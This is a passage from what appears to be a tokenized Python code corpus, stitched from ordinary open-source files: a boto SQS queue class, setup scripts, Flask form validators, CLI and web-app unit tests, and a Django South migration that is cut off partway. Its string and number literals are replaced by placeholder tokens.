<s> """<STR_LIT>""" <EOL> import urlparse <EOL> from boto . sqs . message import Message <EOL> class Queue : <EOL> def __init__ ( self , connection = None , url = None , message_class = Message ) : <EOL> self . connection = connection <EOL> self . url = url <EOL> self . message_class = message_class <EOL> self . visibility_timeout = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . url <EOL> def _id ( self ) : <EOL> if self . url : <EOL> val = urlparse . urlparse ( self . url ) [ <NUM_LIT:2> ] <EOL> else : <EOL> val = self . url <EOL> return val <EOL> id = property ( _id ) <EOL> def _name ( self ) : <EOL> if self . url : <EOL> val = urlparse . urlparse ( self . url ) [ <NUM_LIT:2> ] . split ( '<STR_LIT:/>' ) [ <NUM_LIT:2> ] <EOL> else : <EOL> val = self . url <EOL> return val <EOL> name = property ( _name ) <EOL> def startElement ( self , name , attrs , connection ) : <EOL> return None <EOL> def endElement ( self , name , value , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . url = value <EOL> elif name == '<STR_LIT>' : <EOL> self . visibility_timeout = int ( value ) <EOL> else : <EOL> setattr ( self , name , value ) <EOL> def set_message_class ( self , message_class ) : <EOL> """<STR_LIT>""" <EOL> self . message_class = message_class <EOL> def get_attributes ( self , attributes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . get_queue_attributes ( self , attributes ) <EOL> def set_attribute ( self , attribute , value ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . set_queue_attribute ( self , attribute , value ) <EOL> def get_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> a = self . get_attributes ( '<STR_LIT>' ) <EOL> return int ( a [ '<STR_LIT>' ] ) <EOL> def set_timeout ( self , visibility_timeout ) : <EOL> """<STR_LIT>""" <EOL> retval = self . set_attribute ( '<STR_LIT>' , visibility_timeout ) <EOL> if retval : <EOL> self . visibility_timeout = visibility_timeout <EOL> return retval <EOL> def add_permission ( self , label , aws_account_id , action_name ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . add_permission ( self , label , aws_account_id , action_name ) <EOL> def remove_permission ( self , label ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . remove_permission ( self , label ) <EOL> def read ( self , visibility_timeout = None ) : <EOL> """<STR_LIT>""" <EOL> rs = self . get_messages ( <NUM_LIT:1> , visibility_timeout ) <EOL> if len ( rs ) == <NUM_LIT:1> : <EOL> return rs [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def write ( self , message , delay_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> new_msg = self . connection . send_message ( self , message . get_body_encoded ( ) , delay_seconds ) <EOL> message . id = new_msg . id <EOL> message . md5 = new_msg . md5 <EOL> return message <EOL> def new_message ( self , body = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> m = self . message_class ( self , body ) <EOL> m . queue = self <EOL> return m <EOL> def get_messages ( self , num_messages = <NUM_LIT:1> , visibility_timeout = None , <EOL> attributes = None ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . receive_message ( self , number_messages = num_messages , <EOL> visibility_timeout = visibility_timeout , <EOL> attributes = attributes ) <EOL> def delete_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . delete_message ( self , message ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . delete_queue ( self ) <EOL> def clear ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> self . delete_message ( m ) <EOL> n += <NUM_LIT:1> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> return n <EOL> def count ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> a = self . get_attributes ( '<STR_LIT>' ) <EOL> return int ( a [ '<STR_LIT>' ] ) <EOL> def count_slow ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> n += <NUM_LIT:1> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> return n <EOL> def dump ( self , file_name , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:wb>' ) <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> fp . write ( m . get_body ( ) ) <EOL> if sep : <EOL> fp . write ( sep ) <EOL> n += <NUM_LIT:1> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> fp . close ( ) <EOL> return n <EOL> def save_to_file ( self , fp , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> m = self . read ( ) <EOL> while m : <EOL> n += <NUM_LIT:1> <EOL> fp . write ( m . get_body ( ) ) <EOL> if sep : <EOL> fp . write ( sep ) <EOL> self . delete_message ( m ) <EOL> m = self . read ( ) <EOL> return n <EOL> def save_to_filename ( self , file_name , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:wb>' ) <EOL> n = self . save_to_file ( fp , sep ) <EOL> fp . close ( ) <EOL> return n <EOL> save = save_to_filename <EOL> def save_to_s3 ( self , bucket ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> m = self . read ( ) <EOL> while m : <EOL> n += <NUM_LIT:1> <EOL> key = bucket . new_key ( '<STR_LIT>' % ( self . id , m . id ) ) <EOL> key . set_contents_from_string ( m . get_body ( ) ) <EOL> self . delete_message ( m ) <EOL> m = self . read ( ) <EOL> return n <EOL> def load_from_s3 ( self , bucket , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> if prefix : <EOL> prefix = '<STR_LIT>' % prefix <EOL> else : <EOL> prefix = '<STR_LIT>' % self . id [ <NUM_LIT:1> : ] <EOL> rs = bucket . list ( prefix = prefix ) <EOL> for key in rs : <EOL> n += <NUM_LIT:1> <EOL> m = self . new_message ( key . get_contents_as_string ( ) ) <EOL> self . write ( m ) <EOL> return n <EOL> def load_from_file ( self , fp , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> body = '<STR_LIT>' <EOL> l = fp . readline ( ) <EOL> while l : <EOL> if l == sep : <EOL> m = Message ( self , body ) <EOL> self . write ( m ) <EOL> n += <NUM_LIT:1> <EOL> print '<STR_LIT>' % n <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = body + l <EOL> l = fp . readline ( ) <EOL> return n <EOL> def load_from_filename ( self , file_name , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:rb>' ) <EOL> n = self . load_from_file ( fp , sep ) <EOL> fp . close ( ) <EOL> return n <EOL> load = load_from_filename </s>
<s> import os <EOL> import sys ; reload ( sys ) . setdefaultencoding ( '<STR_LIT:utf-8>' ) <EOL> from distribute_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup , find_packages <EOL> long_description = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT:test>' , ) ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Queue ( object ) : <EOL> def __new__ ( cls , mode = '<STR_LIT>' , * args , ** kwargs ) : <EOL> if mode == '<STR_LIT>' : <EOL> from zenqueue . queue import async <EOL> return async . Queue ( * args , ** kwargs ) <EOL> elif mode == '<STR_LIT>' : <EOL> from zenqueue . queue import sync <EOL> return sync . Queue ( * args , ** kwargs ) <EOL> raise ValueError ( '<STR_LIT>' % ( mode , ) ) </s>
<s> from flask import request <EOL> from werkzeug import FileStorage <EOL> from wtforms import FileField as _FileField <EOL> from wtforms import ValidationError <EOL> def is_file ( field ) : <EOL> return isinstance ( field . data , FileStorage ) and field . data . filename is not None <EOL> class FileField ( _FileField ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def file ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data <EOL> class FileRequired ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = None ) : <EOL> self . message = message <EOL> def __call__ ( self , form , field ) : <EOL> if not is_file ( field ) : <EOL> raise ValidationError , self . message <EOL> file_required = FileRequired <EOL> class FileAllowed ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , upload_set , message = None ) : <EOL> self . upload_set = upload_set <EOL> self . message = message <EOL> def __call__ ( self , form , field ) : <EOL> if not is_file ( field ) : <EOL> return <EOL> if not self . upload_set . file_allowed ( <EOL> field . data , field . data . filename ) : <EOL> raise ValidationError , self . message <EOL> file_allowed = FileAllowed </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import warnings <EOL> from google . appengine . ext import testbed <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> import flask <EOL> from app import create_app <EOL> class LibsImportTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> import libs . flask <EOL> self . path = libs . flask . __path__ <EOL> def test_regular_path_without_libs ( self ) : <EOL> flask_path = flask . __path__ <EOL> assert flask_path == self . path <EOL> class AppTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . testbed = testbed . Testbed ( ) <EOL> self . testbed . activate ( ) <EOL> self . testbed . init_datastore_v3_stub ( ) <EOL> app = create_app ( ) <EOL> self . app = app . test_client ( ) <EOL> def tearDown ( self ) : <EOL> self . testbed . deactivate ( ) <EOL> def test_index_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT:/>' ) <EOL> assert "<STR_LIT>" in rv . data <EOL> def test_flask_default_redirecting ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_todo_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_add_todo_and_redirect ( self ) : <EOL> rv = self . app . post ( '<STR_LIT>' , data = dict ( todo = '<STR_LIT>' ) ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_qunit_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_404_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> import os <EOL> from click . testing import CliRunner <EOL> from unittest . mock import MagicMock <EOL> import yaml <EOL> import zign . api <EOL> from pierone . cli import cli <EOL> def test_version ( monkeypatch ) : <EOL> runner = CliRunner ( ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> def test_login ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x , timeout : response ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False , input = '<STR_LIT>' ) <EOL> with open ( os . path . join ( str ( tmpdir ) , '<STR_LIT>' ) ) as fd : <EOL> data = json . load ( fd ) <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert '<STR_LIT>' in result . output <EOL> assert result . output . rstrip ( ) . endswith ( '<STR_LIT:OK>' ) <EOL> def test_login_given_url_option ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> runner = CliRunner ( ) <EOL> config = { } <EOL> def store ( data , section ) : <EOL> config . update ( ** data ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , store ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x , timeout : response ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False , input = '<STR_LIT>' ) <EOL> assert config == { '<STR_LIT:url>' : '<STR_LIT>' } <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> with open ( os . path . join ( str ( tmpdir ) , '<STR_LIT>' ) ) as fd : <EOL> data = json . load ( fd ) <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert config == { '<STR_LIT:url>' : '<STR_LIT>' } <EOL> def test_scm_source ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1.0>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT>' in result . output <EOL> def test_image ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT:image>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT:1.0>' in result . output <EOL> def test_tags ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' in result . output <EOL> def test_latest ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' == result . output . rstrip ( ) <EOL> def test_latest_not_found ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . raise_for_status . side_effect = Exception ( '<STR_LIT>' ) <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:None>' == result . output . rstrip ( ) <EOL> def test_url_without_scheme ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> def get ( url , ** kwargs ) : <EOL> assert url == '<STR_LIT>' <EOL> return response <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , get ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' in result . output </s>
<s> """<STR_LIT>""" <EOL> import setuptools <EOL> import setup <EOL> from setup import VERSION , DESCRIPTION , LICENSE , URL , AUTHOR , EMAIL , KEYWORDS , CLASSIFIERS <EOL> NAME = '<STR_LIT>' <EOL> def setup_package ( ) : <EOL> version = VERSION <EOL> install_reqs = [ setup . NAME ] <EOL> setuptools . setup ( <EOL> name = NAME , <EOL> version = version , <EOL> url = URL , <EOL> description = DESCRIPTION , <EOL> author = AUTHOR , <EOL> author_email = EMAIL , <EOL> license = LICENSE , <EOL> keywords = KEYWORDS , <EOL> long_description = '<STR_LIT>' . format ( setup . NAME ) , <EOL> classifiers = CLASSIFIERS , <EOL> packages = [ ] , <EOL> install_requires = install_reqs , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup_package ( ) </s>
<s> import json <EOL> import logging <EOL> import pathlib <EOL> from connexion . app import App <EOL> import pytest <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> TEST_FOLDER = pathlib . Path ( __file__ ) . parent <EOL> FIXTURES_FOLDER = TEST_FOLDER / '<STR_LIT>' <EOL> SPEC_FOLDER = TEST_FOLDER / "<STR_LIT>" <EOL> class FakeResponse ( object ) : <EOL> def __init__ ( self , status_code , text ) : <EOL> """<STR_LIT>""" <EOL> self . status_code = status_code <EOL> self . text = text <EOL> self . ok = status_code == <NUM_LIT:200> <EOL> def json ( self ) : <EOL> return json . loads ( self . text ) <EOL> @ pytest . fixture <EOL> def oauth_requests ( monkeypatch ) : <EOL> def fake_get ( url , params = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> params = params or { } <EOL> if url == "<STR_LIT>" : <EOL> token = params [ '<STR_LIT>' ] <EOL> if token == "<STR_LIT:100>" : <EOL> return FakeResponse ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> if token == "<STR_LIT>" : <EOL> return FakeResponse ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> if token == "<STR_LIT>" : <EOL> return FakeResponse ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return url <EOL> monkeypatch . setattr ( '<STR_LIT>' , fake_get ) <EOL> @ pytest . fixture <EOL> def app ( ) : <EOL> app = App ( __name__ , <NUM_LIT> , SPEC_FOLDER , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) <EOL> return app <EOL> @ pytest . fixture <EOL> def simple_api_spec_dir ( ) : <EOL> return FIXTURES_FOLDER / '<STR_LIT>' <EOL> @ pytest . fixture <EOL> def problem_api_spec_dir ( ) : <EOL> return FIXTURES_FOLDER / '<STR_LIT>' <EOL> @ pytest . fixture <EOL> def simple_app ( simple_api_spec_dir ) : <EOL> app = App ( __name__ , <NUM_LIT> , simple_api_spec_dir , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) <EOL> return app <EOL> @ pytest . fixture <EOL> def problem_app ( problem_api_spec_dir ) : <EOL> app = App ( __name__ , <NUM_LIT> , problem_api_spec_dir , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) </s>
<s> import turnstile . checks as checks <EOL> import turnstile . common . output as output <EOL> import turnstile . models . specifications as specifications <EOL> @ checks . Check ( '<STR_LIT>' ) <EOL> def check ( user_configuration , repository_configuration , commit_message ) : <EOL> """<STR_LIT>""" <EOL> logger = output . get_sub_logger ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , commit_message . message ) <EOL> if commit_message . message . startswith ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> raise checks . CheckIgnore <EOL> check_options = repository_configuration . get ( '<STR_LIT>' , { } ) <EOL> allowed_schemes = check_options . get ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> allowed_formats = check_options . get ( '<STR_LIT>' , { '<STR_LIT>' } ) <EOL> logger . debug ( "<STR_LIT>" , allowed_schemes ) <EOL> result = checks . CheckResult ( ) <EOL> specification = specifications . get_specification ( commit_message . message , allowed_formats , allowed_schemes ) <EOL> is_valid_uri = specification . valid <EOL> logger . debug ( '<STR_LIT>' , specification ) <EOL> logger . debug ( "<STR_LIT>" , is_valid_uri ) <EOL> result . successful = is_valid_uri <EOL> if not is_valid_uri : <EOL> result . add_detail ( '<STR_LIT>' . format ( spec = specification ) ) <EOL> return result </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT:default>' , max_length = <NUM_LIT> , blank = True ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> 